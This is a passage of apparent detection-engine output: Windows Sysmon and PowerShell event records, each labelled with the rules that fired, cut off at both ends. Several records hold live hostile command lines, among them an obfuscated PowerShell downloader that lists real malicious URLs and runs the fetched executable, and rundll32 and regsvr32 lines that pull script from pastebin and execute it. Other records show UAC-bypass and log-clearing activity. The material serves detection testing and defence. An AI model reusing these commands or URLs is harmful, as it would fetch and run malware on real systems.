16:24:07.483"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":339882,"Execution_attributes":{"ProcessID":3200,"ThreadID":3596},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-08-02T16:24:07.551366Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-E308-5F26-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"c:\\windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-E8BA-5F26-0000-001035BE1A00","ParentProcessId":8104,"ProcessGuid":"747F3D96-E8BC-5F26-0000-0010F7C41A00","ProcessId":588,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-08-02 16:24:28.637"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":339891,"Execution_attributes":{"ProcessID":3200,"ThreadID":3032},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-08-02T16:24:28.640990Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-90AF-610F-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":632,"ProcessGuid":"747F3D96-182D-610F-0000-00100344D300","ProcessId":11196,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2021-08-07 23:33:01.121"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":556726,"Execution_attributes":{"ProcessID":3232,"ThreadID":4176},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-08-07T23:33:01.176666Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c start /min C:\\Users\\Public\\KDECO.bat reg delete hkcu\\Environment /v windir /f && REM \\system32\\AppHostRegistrationVerifier.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-1231-610F-0000-002057A80700","LogonId":"0x7a857","OriginalFileName":"Cmd.Exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":1108,"ProcessGuid":"747F3D96-183B-610F-0000-0010DC6CD400","ProcessId":11324,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2021-08-07 23:33:15.285"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":557006,"Execution_attributes":{"ProcessID":3232,"ThreadID":4176},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-08-07T23:33:15.303423Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows PowerShell Web Request"],"event":{"Event":{"EventData":{"MessageNumber":1,"MessageTotal":1,"Path":"","ScriptBlockId":"fdd51159-9602-40cb-839d-c31039ebbc3a","ScriptBlockText":"$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\\WOrd\\2019\\ -itemtype DIrectOry;[Net.ServicePointManager]::\"SecURi`T`ypRO`T`oCOL\" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/').\"S`Plit\"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.\"d`OWN`load`FIlE\"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_).\"le`NgTH\" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0')"},"System":{"Channel":"Microsoft-Windows-PowerShell/Operational","Computer":"DESKTOP-RIPCLIP","Correlation_attributes":{"ActivityID":"CCAD9034-7B61-0001-83CF-ADCC617BD601"},"EventID":4104,"EventRecordID":683,"Execution_attributes":{"ProcessID":6620,"ThreadID":6340},"Keywords":"0x0","Level":5,"Opcode":15,"Provider_attributes":{"Guid":"A0C1853B-5C40-4B15-8766-3CF1C58F985A","Name":"Microsoft-Windows-PowerShell"},"Security_attributes":{"UserID":"S-1-5-21-2895499743-3664716236-3399808827-1001"},"Task":2,"TimeCreated_attributes":{"SystemTime":"2020-08-26T05:09:28.845521Z"},"Version":1}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":565591,"Execution_attributes":{"ProcessID":780,"ThreadID":2472},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-18T23:23:37.147709Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x4fd77","SubjectUserName":"administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":32853,"Execution_attributes":{"ProcessID":736,"ThreadID":1592},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-01-20T07:00:50.800225Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x35312","SubjectUserName":"Administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":32950,"Execution_attributes":{"ProcessID":736,"ThreadID":2372},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-01-20T07:29:57.863893Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x35312","SubjectUserName":"Administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Taskmgr as Parent"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\","Description":"Windows Command Processor","FileVersion":"10.0.18362.449 (WinBuild.160101.0800)","Hashes":"SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8C36-5F75-0000-002034E39103","LogonId":"0x391e334","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\windows\\system32\\taskmgr.exe","ParentImage":"C:\\Windows\\System32\\Taskmgr.exe","ParentProcessGuid":"00247C92-858E-5F7B-0000-00105241202B","ParentProcessId":18404,"ProcessGuid":"00247C92-858E-5F7B-0000-0010E741202B","ProcessId":6636,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-10-05 20:43:58.450"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2164892,"Execution_attributes":{"ProcessID":5424,"ThreadID":6708},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-05T20:43:58.451314Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["HH.exe Execution"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\hh.exe\" C:\\Users\\IEUser\\Desktop\\Fax Record N104F.chm","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Microsoft® HTML Help Executable","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4B1E2F8EFBECB677080DBB26876311D9E06C5020,MD5=1CECEE8D02A8E9B19D3A1A65C7A2B249,SHA256=8AB2F9A4CA87575F03F554AEED6C5E0D7692FA9B5D420008A1521F7F7BD2D0A5,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C","Image":"C:\\Windows\\hh.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-ABD5-5D3A-0000-0020EB990F00","LogonId":"0xf99eb","ParentCommandLine":"C:\\Windows\\Explorer.EXE","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-ABD7-5D3A-0000-001012661000","ParentProcessId":4940,"ProcessGuid":"747F3D96-AE22-5D3A-0000-001096B24E00","ProcessId":1504,"Product":"HTML Help","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-26 07:39:14.345"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4348,"Execution_attributes":{"ProcessID":5924,"ThreadID":6056},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-26T07:39:14.375565Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Copy From or To System32","HTML Help Shell Spawn","Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /c copy /Y C:\\Windows\\system32\\rundll32.exe %%TEMP%%\\out.exe > nul && %%TEMP%%\\out.exe javascript:\"\\..\\mshtml RunHTMLApplication \";document.write();h=new%%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");h.Open(\"GET\",\"http://pastebin.com/raw/y2CjnRtH\",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im out.exe\",0,true);}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-ABD5-5D3A-0000-0020EB990F00","LogonId":"0xf99eb","ParentCommandLine":"\"C:\\Windows\\hh.exe\" C:\\Users\\IEUser\\Desktop\\Fax Record N104F.chm","ParentImage":"C:\\Windows\\hh.exe","ParentProcessGuid":"747F3D96-AE22-5D3A-0000-001096B24E00","ParentProcessId":1504,"ProcessGuid":"747F3D96-AE22-5D3A-0000-001004D84E00","ProcessId":5548,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-26 07:39:14.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4353,"Execution_attributes":{"ProcessID":5924,"ThreadID":6056},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-26T07:39:14.935857Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" zipfldr.dll,RouteTheCall c:\\Windows\\System32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-2523-5CD8-0000-00204C360100","LogonId":"0x1364c","ParentCommandLine":"python winpwnage.py -u execute -i 14 -p c:\\Windows\\System32\\calc.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-268F-5CD8-0000-0010F4A51700","ParentProcessId":1256,"ProcessGuid":"365ABB72-269E-5CD8-0000-001084F81A00","ProcessId":2728,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:58:54.772"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16443,"Execution_attributes":{"ProcessID":2036,"ThreadID":296},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:58:54.897009Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Indirect Command Execution"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows Calculator","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=9018A7D6CDBE859A430E8794E73381F77C840BE0,MD5=60B7C0FEAD45F2066E5B805A91F4F0FC,SHA256=80C10EE5F21F92F89CBC293A59D2FD4C01C7958AACAD15642558DB700943FA22,IMPHASH=F93B5D76132F6E6068946EC238813CE1","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-4FB5-5CD8-0000-0020F2350100","LogonId":"0x135f2","ParentCommandLine":"\"C:\\Windows\\System32\\pcalua.exe\" -a c:\\Windows\\system32\\calc.exe","ParentImage":"C:\\Windows\\System32\\pcalua.exe","ParentProcessGuid":"365ABB72-517E-5CD8-0000-001024D61700","ParentProcessId":2952,"ProcessGuid":"365ABB72-517E-5CD8-0000-00105FE01700","ProcessId":2920,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 17:01:50.852"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16498,"Execution_attributes":{"ProcessID":2012,"ThreadID":300},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T17:01:51.007950Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Microsoft(C) Register Server","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-63FC-5CD8-0000-0020EE3E0100","LogonId":"0x13eee","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-6693-5CD8-0000-0010AE4C0E00","ParentProcessId":3528,"ProcessGuid":"365ABB72-6759-5CD8-0000-0010E2D50F00","ProcessId":1420,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 18:35:05.140"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16792,"Execution_attributes":{"ProcessID":1880,"ThreadID":2020},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T18:35:05.155949Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Command Line Without DLL"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-63FC-5CD8-0000-0020EE3E0100","LogonId":"0x13eee","ParentCommandLine":"regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"365ABB72-6759-5CD8-0000-0010E2D50F00","ParentProcessId":1420,"ProcessGuid":"365ABB72-6759-5CD8-0000-001085031000","ProcessId":1912,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 18:35:05.765"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16793,"Execution_attributes":{"ProcessID":1880,"ThreadID":2020},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T18:35:05.780949Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-F419-5D53-0000-002026910200","LogonId":"0x29126","ParentCommandLine":"C:\\Windows\\Explorer.EXE","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-F41E-5D53-0000-001067C80300","ParentProcessId":4824,"ProcessGuid":"747F3D96-FBCA-5D53-0000-0010B8664100","ProcessId":2476,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-14 12:17:14.447"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":10674,"Execution_attributes":{"ProcessID":2004,"ThreadID":4480},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-14T12:17:14.614739Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["FromBase64String Command Line","Encoded FromBase64String","Suspicious Script Execution From Temp Folder","Encoded IEX"],"event":{"Event":{"EventData":{"CommandLine":"\"c:\\windows\\system32\\wscript.exe\" /E:vbs c:\\windows\\temp\\icon.ico \"powershell -exec bypass -c \"\"IEX 